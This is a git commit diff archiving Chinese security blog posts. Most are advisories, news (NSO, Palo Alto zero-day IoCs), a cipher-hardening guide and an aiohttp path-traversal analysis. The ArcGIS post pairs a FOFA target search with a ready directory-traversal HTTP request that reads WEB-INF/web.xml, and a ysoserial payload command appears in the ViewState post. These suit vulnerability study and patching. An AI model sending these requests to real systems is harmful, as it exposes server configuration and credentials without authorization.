【安全圈】安全公司曝光黑客利用 Office 已知漏洞散播 Remcos RAT 木马程序、【安全圈】物联网云平台 OvrC 曝一系列漏洞,黑客可远程执行恶意代码、某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)、僵尸网络利用GeoVision零日漏洞入侵已停产设备、Palo Alto Networks确认近期披露的零日漏洞正在被积极利用、NSO 集团在 Meta 所有公司起诉后仍然使用 WhatsApp 漏洞、工具 | 集成高危漏洞exp的实用性渗透工具、一键检测 17 个蓝凌 OA 历史漏洞、ArcGIS 地理信息系统 任意文件读取漏洞、CVE-2016-2183 windows漏洞修复指南、ViewState反序列化复现踩坑记录、【OSCP-Medium】adria、【漏洞复现】英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞、aiohttp路径遍历漏洞分析(XCE-2024-1472)、速修!宝兰德BES中间件远程代码执行漏洞、打补丁要快!0Day漏洞正在被黑客广泛利用、安全公司曝光黑客利用 Office 已知漏洞散播 Remcos RAT 木马程序、大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【漏洞复现|附nuclei-POC】、

This commit is contained in:
test 2024-11-18 04:14:22 +00:00
parent 20190803b1
commit ca5c646679
17 changed files with 1665 additions and 60 deletions

View File

@ -94,5 +94,23 @@
"https://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509326&idx=1&sn=570638ea0ce6a3b289d77d2247e5d57c": "BrazenBamboo APT 利用 FortiClient 零日漏洞窃取用户凭证 |China APT", "https://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247509326&idx=1&sn=570638ea0ce6a3b289d77d2247e5d57c": "BrazenBamboo APT 利用 FortiClient 零日漏洞窃取用户凭证 |China APT",
"https://mp.weixin.qq.com/s?__biz=MzkxMTUwOTY1MA==&mid=2247489498&idx=1&sn=49ceb0446f31d62653ef7dd2505388c0": "[渗透工具]XXL-JOB漏洞利用工具", "https://mp.weixin.qq.com/s?__biz=MzkxMTUwOTY1MA==&mid=2247489498&idx=1&sn=49ceb0446f31d62653ef7dd2505388c0": "[渗透工具]XXL-JOB漏洞利用工具",
"https://mp.weixin.qq.com/s?__biz=MzkxMTUwOTY1MA==&mid=2247489498&idx=2&sn=433215d4f66547bb871b6d516c154124": "【必刷靶场】JavaSecLab-Java漏洞平台", "https://mp.weixin.qq.com/s?__biz=MzkxMTUwOTY1MA==&mid=2247489498&idx=2&sn=433215d4f66547bb871b6d516c154124": "【必刷靶场】JavaSecLab-Java漏洞平台",
"https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488410&idx=1&sn=00d2155ead01651c376774f463157bf3": "【未公开】某公司SRM智联云采系统inquiry存在SQL注入漏洞" "https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488410&idx=1&sn=00d2155ead01651c376774f463157bf3": "【未公开】某公司SRM智联云采系统inquiry存在SQL注入漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066040&idx=2&sn=cf11d094cb7fc2770df2100227dc34db&chksm=f36e7cb8c419f5ae9268e1d2eb9675ef94bccbcfe66627cb209b0883944215f205a8d17b7028&scene=58&subscene=0": "【安全圈】安全公司曝光黑客利用 Office 已知漏洞散播 Remcos RAT 木马程序",
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066040&idx=3&sn=628c0be39463e5a5db076252eae42974&chksm=f36e7cb8c419f5ae9694e18d60dde2a26e6a3cdec1633acf1fe266e96be9e59868eaad6f37a5&scene=58&subscene=0": "【安全圈】物联网云平台 OvrC 曝一系列漏洞,黑客可远程执行恶意代码",
"https://mp.weixin.qq.com/s?__biz=Mzg4MTkwMTI5Mw==&mid=2247486157&idx=1&sn=0eb5b289e5d313ff2f2ad3df252a5d5f": "某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)",
"https://mp.weixin.qq.com/s?__biz=Mzg3OTc0NDcyNQ==&mid=2247492765&idx=1&sn=e18518b6eba34c7864e6d957cd37ff5f": "僵尸网络利用GeoVision零日漏洞入侵已停产设备",
"https://mp.weixin.qq.com/s?__biz=Mzg3OTc0NDcyNQ==&mid=2247492765&idx=2&sn=e224f07a4c556302ed2013bcdf25a5f1": "Palo Alto Networks确认近期披露的零日漏洞正在被积极利用",
"https://mp.weixin.qq.com/s?__biz=Mzg3OTc0NDcyNQ==&mid=2247492765&idx=3&sn=01d577e47672144123dfd3940c1da101": "NSO 集团在 Meta 所有公司起诉后仍然使用 WhatsApp 漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247519321&idx=2&sn=dc8716f9fcab81c2277f69ca05988f6b": "工具 | 集成高危漏洞exp的实用性渗透工具",
"https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247499683&idx=1&sn=23b5001cd5e4272d908cf85c0d71263d": "一键检测 17 个蓝凌 OA 历史漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489220&idx=1&sn=e2a2c434a0097ee0fb4fb89b17b1fc15": "ArcGIS 地理信息系统 任意文件读取漏洞",
"https://mp.weixin.qq.com/s?__biz=MzkzMDQ0NzQwNA==&mid=2247485612&idx=1&sn=b87343f522578525738b25e651a30307": "CVE-2016-2183 windows漏洞修复指南",
"https://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247490413&idx=1&sn=6ca7f49ea787ea876726f5c8f4be6c46": "ViewState反序列化复现踩坑记录",
"https://mp.weixin.qq.com/s?__biz=Mzk0MDQzNzY5NQ==&mid=2247493031&idx=1&sn=21ad65e6ba6fa690057bf1b717d89cab": "【OSCP-Medium】adria",
"https://mp.weixin.qq.com/s?__biz=MzkyMjcxNzE2MQ==&mid=2247484315&idx=1&sn=f4aa02a7e95ecbc0b1052e97591654d0": "【漏洞复现】英飞达医学影像存档与通信系统webservices接口存在信息泄露漏洞",
"https://mp.weixin.qq.com/s?__biz=MzU2NDY2OTU4Nw==&mid=2247517121&idx=1&sn=d93187139204f6dd92101f34c4cb0981": "aiohttp路径遍历漏洞分析(XCE-2024-1472)",
"https://mp.weixin.qq.com/s?__biz=Mzg5MTc3ODY4Mw==&mid=2247507405&idx=1&sn=724c4f04b89e17186e10643a70168151": "速修宝兰德BES中间件远程代码执行漏洞",
"https://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247534105&idx=2&sn=b8ad0236e78d31c7e936fa98d5b2f0db": "打补丁要快0Day漏洞正在被黑客广泛利用",
"https://mp.weixin.qq.com/s?__biz=MzkyNDUxNTQ2Mw==&mid=2247485556&idx=1&sn=eaa0ff13c10fad4d5418731121ca9ca2": "安全公司曝光黑客利用 Office 已知漏洞散播 Remcos RAT 木马程序",
"https://mp.weixin.qq.com/s?__biz=MzkyOTcwOTMwMQ==&mid=2247484440&idx=1&sn=f7f42cf480466e7eb9a5349ff68579a9": "大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【漏洞复现|附nuclei-POC】"
} }

View File

@ -0,0 +1,105 @@
# ArcGIS 地理信息系统 任意文件读取漏洞
Superhero nday POC 2024-11-18 02:08
![](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkYN4sZibCVo6EFo0N9b7Kib4I4N6j6Y10tynLOdgov9ibUmaNwW5yeoCbQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCkhic5lbbPcpxTLtLccZ04WhwDotW7g2b3zBgZeS5uvFH4dxf0tj0Rutw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/Melo944GVOJECe5vg2C5YWgpyo1D5bCk524CiapZejYicic1Hf8LPt8qR893A3IP38J3NMmskDZjyqNkShewpibEfA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的
POC信息及
POC对应脚本
而造成的任何直接或者间接的后果及损失均由使用者本人负责公众号nday poc及作者不为此承担任何责任一旦造成后果请自行承担如文章有侵权烦请及时告知我们会立即删除文章并致歉。谢谢
**00******
**产品简介**
ArcGIS 是由美国Esr公司研发的地理信息系统(GIS)软件它整合了数据库、软件工程、人工智能、网络技术、云计算等主流的I技术旨在为用户提供一套完整的、开放的企业级GIS解决方案它包含了一套带有 用户界面组件的Windows桌面应用。可以实现从简单到复杂的地理信息系统( GIS )任务,如制图、地理分析、数据编辑、数据管理、可视化和空间处理等。
**01******
**漏洞概述**
ArcGIS地理信息系统 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
**02******
**搜索引擎**
FOFA: 
```
app="esri-ArcGIS"
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLicicw4EkCoxCOxBfnuQdM0YFHQ6UkUTTPZofhmv5L5ia28VltfDJgGnkZhZ1GOzkX03CB2pts483dg/640?wx_fmt=png&from=appmsg "")
**03******
**漏洞复现**
```
GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLicicw4EkCoxCOxBfnuQdM0YzMsw4tZqMygKTib6qU6LqDzuOcIQFjfQe8Bn97oJQSlU8toaNVybABg/640?wx_fmt=png&from=appmsg "")
**04**
**检测工具**
nuclei
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLicicw4EkCoxCOxBfnuQdM0YEN4Aia5fPHnJxiaRx2MVLZDa0qu7ZiagUNccofxuVXwiasK4kKWiaZZtibOQ/640?wx_fmt=png&from=appmsg "")
afrog
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLicicw4EkCoxCOxBfnuQdM0Yy0Y4Wndl0MthY1vw8T5jJjMlMDgbHicA1mjR9KxyABCyKUzxSfdBHIQ/640?wx_fmt=png&from=appmsg "")
xray
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwLicicw4EkCoxCOxBfnuQdM0YunSkglxSUYBU6nI124hl2O0hnv9evc5DNGCUxVJGV4jKkm52ahtDicQ/640?wx_fmt=png&from=appmsg "")
**05******
**修复建议**
1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本
**06******
**内部圈子介绍**
1、本圈子主要是分享网上公布的1day/nday POC详情及对应检测脚本目前POC脚本均支持xray、afrog、nuclei等三款常用工具。 
2、三款工具都支持内置poc+自写poc目录一起扫描。 
3、保持每周更新10-15个poc。 
4、所发布的POC脚本均已测试完毕直接拿来即用。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/wnJTy44dqwI0X77l5WtnpfTexA6RwHXSbf1x3ZyT3bhcbWzRoFLyAgHkSMk9yGaZK5FDGcSCQp9ibPcicxHXIOcg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")

View File

@ -0,0 +1,60 @@
# CVE-2016-2183 windows漏洞修复指南
原创 ralap 网络个人修炼 2024-11-18 02:00
最近漏洞扫描发现主机存在CVE-2016-2183网上教程基本都是修复后需要重启本着服务器能不重启就不重启原则查了微软官网和阿里云漏洞库相关介绍整理了一份不需要重启的漏洞修复指南亲测有效。
![](https://mmbiz.qpic.cn/mmbiz_png/5y2fUaoQPfL5nWe5gN236Hy1LEUy8wDhVHNZASrANzSuicwn2p1YA52wKTf6vXk6lPjFjSHaQQlldiag6l70bhZg/640?wx_fmt=png&from=appmsg "")
**一、漏洞简介**
CVE-2016-2183 漏洞涉及 SSL/TLS 协议中使用的短块加密算法(例如 DES 和 3DES这些算法因存在安全风险而受到关注如 Sweet32 攻击。在 Windows Server 环境中,此漏洞可能影响使用远程桌面协议 (RDP) 或 HTTPS 服务的情况。
**二、快速验证漏洞是否存在**
```
nmap -p 3389 --script ssl-enum-ciphers 指定IP
```
Windows一般为3389远程桌面或443使用加密套件因此通过nmap的ssl-enum-ciphers脚本来扫描远程服务器支持的SSL/TLS加密算法
![](https://mmbiz.qpic.cn/mmbiz_png/5y2fUaoQPfL5nWe5gN236Hy1LEUy8wDhs38RD8saGPWQeaEF2ZthcDkSKwY6icGggBcO5WRKVZCiaXUtIUZLZXicw/640?wx_fmt=png&from=appmsg "")
nmap扫描结果建议禁用或避免使用3DES、RC4以及使用MD5进行消息完整性校验的密码套件
**三、漏洞修复方法**
根据漏洞原理、Nmap建议以及 Microsoft 官方文档整理如下:
导航到 SCHANNEL 配置
**·**按
Win + R 键,输入
regedit然后按 Enter。在注册表编辑器中导航到以下路径
```
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Cipheres\
```
禁用易受攻击的加密算法
**·**在
Ciphers 文件夹下,为以下每个易受攻击的加密算法创建一个新的 DWORD32位并将其值设置为
0禁用
-
**注意事项**对“CIPHERS”项或“HASHES”项的任何内容更改都将立即生效无需重启系统。
**四、复扫验证**
再次使用NMAP扫描可见相关算法已被成功禁用
![](https://mmbiz.qpic.cn/mmbiz_png/5y2fUaoQPfL5nWe5gN236Hy1LEUy8wDhiahicA1sppj3Kq1WCSjo74hL5jobz1MCxQwMfmHwaibo6czOUsur4yYCg/640?wx_fmt=png&from=appmsg "")
在进行任何系统更改之前,请确保备份整个系统或至少备份注册表。
**参考链接:**
https://docs.microsoft.com/zh-cn/troubleshoot/windows-server/windows-security/restrict-cryptographic-algorithms-protocols-schannel
https://avd.aliyun.com/detail?id=AVD-2016-2183
https://sweet32.info/

View File

@ -0,0 +1,18 @@
# NSO 集团在 Meta 所有公司起诉后仍然使用 WhatsApp 漏洞
鹏鹏同学 黑猫安全 2024-11-18 03:31
![](https://mmbiz.qpic.cn/sz_mmbiz_png/8dBEfDPEce8RJzryJUo3WY0AjBJGNhHKXVkoicObV7kIGibpvlBxxwUyviaQq5gnwFhLx7tERDye1uujMEe8Om18A/640?wx_fmt=png&from=appmsg "")
NSO 集团在 Meta 所有公司起诉后仍然使用 WhatsApp 漏洞。法院文件中写道“作为一个门槛问题NSO 承认它开发和销售了与诉讼相关的间谍软件,并且 NSO 的间谍软件——特别是其名为“Eden”的零点击安装向量以及 WhatsApp 基于向量的 Hummingbird 家族( collective, “Malware Vectors”——负责了诉讼中描述的攻击。NSO 的 R&D 部门主任确认,这些向量正如诉讼中所 allege 的那样工作。”
NSO 集团继续使用 WhatsApp 漏洞包括名为“Erised”的间谍软件即使已经被起诉违反反黑客法。专家们检测到三种漏洞称为“Heaven”、“Eden”和“Erised”这些漏洞在超过 1,400 次攻击中被用于 NSO 集团。文件继续写道:“即使 WhatsApp 在 2019 年 5 月检测和阻止了诉讼中描述的漏洞NSO 承认它开发了另一个安装向量(称为 Erised该向量也使用 WhatsApp 服务器安装 Pegasus。NSO 继续使用和向客户提供 Erised即使已经被诉讼直到 WhatsApp 在 2020 年 5 月后的某个时候阻止了它的访问。NSO 的证人拒绝回答它是否在此后开发了更多的 WhatsApp 基于 Malware Vectors。”
NSO 集团员工创造和使用 WhatsApp 账户来开发间谍软件,违反 WhatsApp 的服务条款多种方式包括反向工程、传输有害代码、未经授权收集用户数据和非法访问平台。这些行为也违反了计算机欺骗和滥用法CFAA和加利福尼亚州的全面计算机数据访问和欺骗法CDAFA。WhatsApp 声称由于这些违法行为而受到损害。
2019 年 10 月WhatsApp 起诉了以色列监控公司 NSO 集团指控其对用户进行恶意攻击。诉讼中称NSO 集团试图对大约 1,400 个个人进行 WhatsApp 黑客攻击。
2019 年 5 月Facebook 修复了 WhatsApp 中的一种关键 zero-day 漏洞,追踪为 CVE-2019-3568这个漏洞被利用来远程安装手机上的间谍软件。时报报道称WhatsApp zero-day 漏洞被威胁actors 使用以交付由监控公司 NSO 集团开发的间谍软件。
NSO 集团开发的间谍软件被全球政府组织用于监控人权组织、活动家、记者、律师和异见人士。安全专家们已经检测和分析了该公司的武器库中的一些工具,例如流行的 Pegasus间谍软件用于 iOS和 Chrysaor用于 Android

View File

@ -0,0 +1,19 @@
# Palo Alto Networks确认近期披露的零日漏洞正在被积极利用
鹏鹏同学 黑猫安全 2024-11-18 03:31
![](https://mmbiz.qpic.cn/sz_mmbiz_png/8dBEfDPEce8RJzryJUo3WY0AjBJGNhHKW6gFiatBVjK55cicDwXSJCdbh88GDS1MoH5Kr74APs7Iwmozf93chMcA/640?wx_fmt=png&from=appmsg "")
上周Palo Alto Networks 警告客户限制对其下一代防火墙管理界面的访问,因为 PAN-OS 中存在潜在的远程代码执行漏洞CVSSv4.0 基本分数9.3)。当时该网络安全公司没有提供关于该漏洞的更多细节,并且不知道该漏洞正在被积极利用。
其安全公告中写道“Palo Alto Networks 意识到有人声称通过 PAN-OS 管理界面存在远程代码执行漏洞。目前,我们还不了解所声称漏洞的具体情况。我们正在积极监控任何利用迹象。我们强烈建议客户确保根据我们推荐的最佳实践部署指南正确配置对管理界面的访问。特别是,我们建议您确保只有从受信任的内部 IP 地址才能访问管理界面,而不是从互联网访问。绝大多数防火墙已经遵循此 Palo Alto Networks 和行业最佳实践。” Palo Alto Networks 建议审查保护其设备管理访问权限的最佳实践。保护 Palo Alto 管理界面的指南包括:将其隔离在专用管理 VLAN 上、使用跳板服务器进行访问、将入站 IP 地址限制为已批准的管理设备以及仅允许安全通信SSH、HTTPS和 PING 用于连接测试。
该网络安全公司表示,他们没有关于任何入侵指标的足够信息。现在,该公司确认其 PAN-OS 防火墙管理界面中的零日漏洞已在野外被积极利用,并发布了入侵指标 (IoC)。
其安全公告中写道“Palo Alto Networks 观察到威胁活动利用未经身份验证的远程命令执行漏洞针对暴露于互联网的少量防火墙管理界面。我们正在积极调查此活动。我们强烈建议客户确保根据我们推荐的最佳实践部署指南正确配置对管理界面的访问。特别是,我们建议您立即确保只有从受信任的内部 IP 地址才能访问管理界面,而不是从互联网访问。绝大多数防火墙已经遵循此 Palo Alto Networks 和行业最佳实践。” 该网络安全公司观察到来自以下 IP 地址的恶意活动136.144.17.0/24、173.239.218.251、216.73.162.
0/24。该公告指出这些 IP 地址可能与 VPN 服务相关联,因此也与合法用户活动相关联。
Palo Alto 表示,该零日漏洞已被利用来在受感染设备上部署 Web shell从而获得持久的远程访问权限。CVE 编号正在等待分配。“我们观察到一个 Web shell其校验和为 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668。”
该公告写道。将管理界面访问权限限制为特定 IP 地址可以显著降低利用风险首先需要特权访问。在这种情况下CVSS 分数降至 7.5(高)。本周,美国网络安全和基础设施安全局 (CISA) 将以下 Palo Alto Expedition 漏洞添加到其已知已利用漏洞 (KEV) 目录中CVE-2024-9463 Palo Alto Networks Expedition 操作系统命令注入漏洞CVE-2024-9465 Palo Alto Networks Expedition SQL 注入漏洞。

View File

@ -1,5 +1,5 @@
# ViewState反序列化复现踩坑记录 # ViewState反序列化复现踩坑记录
TtTeam 2024-11-16 16:01 阿乐你好 2024-11-18 01:34
<table><tbody><tr><td width="557" valign="top" height="62" style="word-break: break-all;"><section style="margin-bottom: 15px;"><span style="font-size: 14px;"><span style="color: rgb(217, 33, 66);"><strong>声明:</strong></span>该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。</span></section><section><span style="font-size: 14px;">请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。</span></section></td></tr></tbody></table> <table><tbody><tr><td width="557" valign="top" height="62" style="word-break: break-all;"><section style="margin-bottom: 15px;"><span style="font-size: 14px;"><span style="color: rgb(217, 33, 66);"><strong>声明:</strong></span>该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。</span></section><section><span style="font-size: 14px;">请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。</span></section></td></tr></tbody></table>
@ -311,3 +311,41 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f LosFormatter -c "echo 123 > C:
**关注我们**
![](https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOeSsicAgIUNHtMib9a69NOWXw1A7mgRqqiat1SycQ0b6e5mBqC0pVJ3oicrQnCTh4gqMGiaKUPicTsUc4Tw/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
 还在等什么?赶紧点击下方名片开始学习吧 ![](https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOeSsicAgIUNHtMib9a69NOWXw1A7mgRqqiat1SycQ0b6e5mBqC0pVJ3oicrQnCTh4gqMGiaKUPicTsUc4Tw/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
**知 识 星 球**
仅前1-400名: 99¥400-600名
: 128¥
600-800名
: 148¥
800-1000+名
: 168¥
所剩不多了...
![](https://mmbiz.qpic.cn/sz_mmbiz_png/XOPdGZ2MYOdma4QtfwXXJ4w35lMtvMcogAnI5u4bWIhxq1EzXI0remsQXFk5uhv0BX4eSyzpzJGYHAybgEYeVA/640?wx_fmt=png&from=appmsg "")
**推 荐 阅 读**
[](http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247499188&idx=1&sn=9ce15a0e66b2595285e544aaa0c49c24&chksm=cfa559a7f8d2d0b162f00e0c1b02c85219f2668c282b32967b2530f15051b47b21ee2855a783&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247496043&idx=1&sn=4daa27ade9915de6021fea1c2a21d7bc&chksm=cfa55578f8d2dc6ef887ce27215f942ec233320fa6878bc1666ce0fecb0e7f6c7f96a3ba4e2b&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247486327&idx=1&sn=71fc57dc96c7e3b1806993ad0a12794a&chksm=cfa6af64f8d1267259efd56edab4ad3cd43331ec53d3e029311bae1da987b2319a3cb9c0970e&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdAPjIVeN2ZahG9ibP0Y3wlfg6BO1WO7MZfo1JeW7zDWcLSTQ5Ek8zXAia5w1nMnogpbpXP6OxXXOicA/640?wx_fmt=png "")

View File

@ -0,0 +1,125 @@
# aiohttp路径遍历漏洞分析(XCE-2024-1472)
船山信安 2024-11-18 01:18
# 前言
微步发的漏洞通告**aiohttp**存在路径遍历漏洞,**fofa**搜了一下资产,确实挺多的,因为**poc**没有公布,所以并不知道漏洞的详情,但是见了这么多的路径遍历,基本上都不会产生什么变化,最多就是转换下编码的问题,比如说**GlassFish**出现的**UTF8**超长编码导致的任意文件读取等等于是就来简单分析下顺便学习一下aiohttp处理请求的一些流程。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nD6GyeSIooMfro34oGQR4bEfcPFnT3ODf3ibyCs8dyJ0XY4VV5MfwRQQ/640?wx_fmt=png&from=appmsg "")
# 关于aiohttp
之前并没有使用过**aiohttp** 进行一些开发的操作所以对这个框架的处理源代码并不熟悉但是应该与async这类异步的东西有关系。
aiohttp 是一个基于异步的 Python Web 开发框架可用于编写基于 asyncio 的异步网络应用程序。它提供了对 HTTP 客户端和服务器的支持,使得编写高效的异步 Web 服务变得更加简单。
aiohttp 基于 Python 3.5+ 的 asyncio 模块使用异步的方式处理网络请求和响应从而实现高并发的网络通信。它支持 WebSocket、HTTP/1.1 和 HTTP/2 协议并提供了丰富而灵活的 API使得开发者能够轻松地构建异步的 Web 应用程序。
使用 aiohttp开发者可以通过异步的方式处理并发请求、管理长连接、支持 WebSockets 等功能同时享受到 Python 的简洁和易用性。它非常适合构建需要高性能、高并发的 Web 服务,尤其适用于 I/O 密集型的应用场景。
## 源码对比
从aiohttp源码 里面对比一下版本大致能够知道开发者修复的东西这里修复的版本后是3.9.2之后所以这里拿了3.9.1与3.9.2对比找修改的地方最终是在urlDispatcher即URL的分发和处理模块找到了异常开发者更改了条件判断语句的方式并且原先的joinpath改成了os.path.normpathos.path.normpath有一个优点就是会消除掉路径中的.或..分隔符返回规范化的路径这里原先的代码应该就是漏洞的产生点也就是与follow_symlinks参数有关。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nxQjgh2O0c9HLVdNq9iaj7TDUGHMoz8HOfne4ZmQgMthmDUUgx6kQzWQ/640?wx_fmt=png&from=appmsg "")
关于follow_symlinks:
在 **aiohttp** follow_symlinks 参数用于指定是否应该跟随符号链接。符号链接是一种特殊的文件类型它是文件系统中的一个指向另一个文件或目录的链接。当 follow_symlinks 参数设置为 True **aiohttp** 会跟随符号链接来访问目标文件或目录当设置为 False **aiohttp** 不会跟随符号链接而是直接访问链接本身。
用例子来说就是,比如有下面的这样一段代码:
```
```
> 比如说这个例子如果在static文件夹里面创建一个link的符号链接指向另一个文件夹那么就可以通过/static/link访问符号链接指向的静态文件也就是另一个文件夹中的静态文件。
# 漏洞分析
看上面的改的代码修复方式,应该就是最简单的../穿越的形式,通过**fofa**找资产来进行测试的时候,验证到确实是这样的,当访问一些静态文件的时候,可以通过目录穿越的形式进行文件的读取。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nFKDcNfSeVG9JZdeuOsjQBSccMia1jmmiaFceaDKgLVNpn7YtrJ8hkPOQ/640?wx_fmt=png&from=appmsg "")
尝试在本地起环境因为是与静态文件以及follow_symlinks有关系所以应该是在设置静态文件的访问路径的时候通过add_static函数造成的。
```
```
程序就五行代码在这里打断点访问静态文件肯定是没反应的所以只能在处理源代码里面打断点首先简单分析下在启动程序时add_static的操作它会到web_urldispatcher#StaticResource静态资源类中根据参数配置一些静态资源
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30n5ACskHC2KnxfDEtC7IMeDuIjP7wAO7d6PwA4VE8j9FKsJIkTuwzbhg/640?wx_fmt=png&from=appmsg "")
> 首先根据你写的路径创建一个Path类就是指明静态资源的文件夹路径然后判断路径是否以~开头对linux系统中用户目录做特殊处理然后判断路径是否是目录是否为空最终将foolow_symlinks、chunk_size等赋值进去chunk_size是返回静态文件时分块的大小最终配置路由和处理器只允许GET或HEAD请求这里的_hadler是静态资源的处理器即StaticResource._handle
创建完成staticResouce类后通过register_resource对静态资源进行注册。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nkgkVSAv7nMR60G6OrFo0iaL5FAvialBDa10FKwPzQGQCoX4nsRXYfcWA/640?wx_fmt=png&from=appmsg "")
在register_resource方法中判断资源类型是否是动态资源(指的是通过请求响应动态生成的一些页面等资源)再判断注册的路由是否是不可用的路由中下面再通过是否赋值了name等特殊处理最终是将资源加到了_resources列表里面完成了add_static
下面是漏洞请求触发的具体流程:
首先发起请求后会进入到_handler判断是否有线程循环是否是debug模式后会来到UrlDispacher类的resolve对路由请求进行处理获取到请求的method后遍历前面的资源列表获取resource
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nexcU8YpGjW2OaU84uYDNGNEia9vfrLo7bdw72rNh0XcTkg89pv4DOVQ/640?wx_fmt=png&from=appmsg "")
resource.resolve的处理逻辑也是十分简单获取到请求的完整文件路径后通过self_prefix也就是add_static时候写的/static然后从完整路径中去除/static作为文件名最终返回请求方法和一个UrlMappingMatchInfo类这个类记录了请求的方法文件名要处理的handler请求的路径等。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30n5KbGmY41lm7CAG0uGbjDuRHepe5Dht6jpYGcflghh45o9B0c68Mmiaw/640?wx_fmt=png&from=appmsg "")
当请求的前缀是正确的并且方法也是允许的返回一个有效的UrlMappingMatchInfo返回到_handler中经过异常处理后将应用程序对象添加到路由匹配信息路由匹配信息用于存储与请求 URL 相关的路由信息包括路由处理函数、路由参数等当这些路由信息都准备完毕通过freeze锁定路由信息确保在后续的处理过程中信息不会被意外修改。再从请求头中获取Expect的信息选择expect_handler 处理器处理(这里没有)它就选择了UrlMappingMatchInfo中的StaticResource._handler进行处理。
选择好了handler后会通过判断是否有中间件先做中间件的处理这里没有就不看了最终会使用选择到的处理器处理request请求。
![](https://mmbiz.qpic.cn/mmbiz_png/7nIrJAgaibicP8Wia0Urd6ITiadLzWkMB30nXYCYUdKR1EMFneSEPVqh2WuNianibqvhJw89tdUaA5dcMkk1q4dic8vtg/640?wx_fmt=png&from=appmsg "")
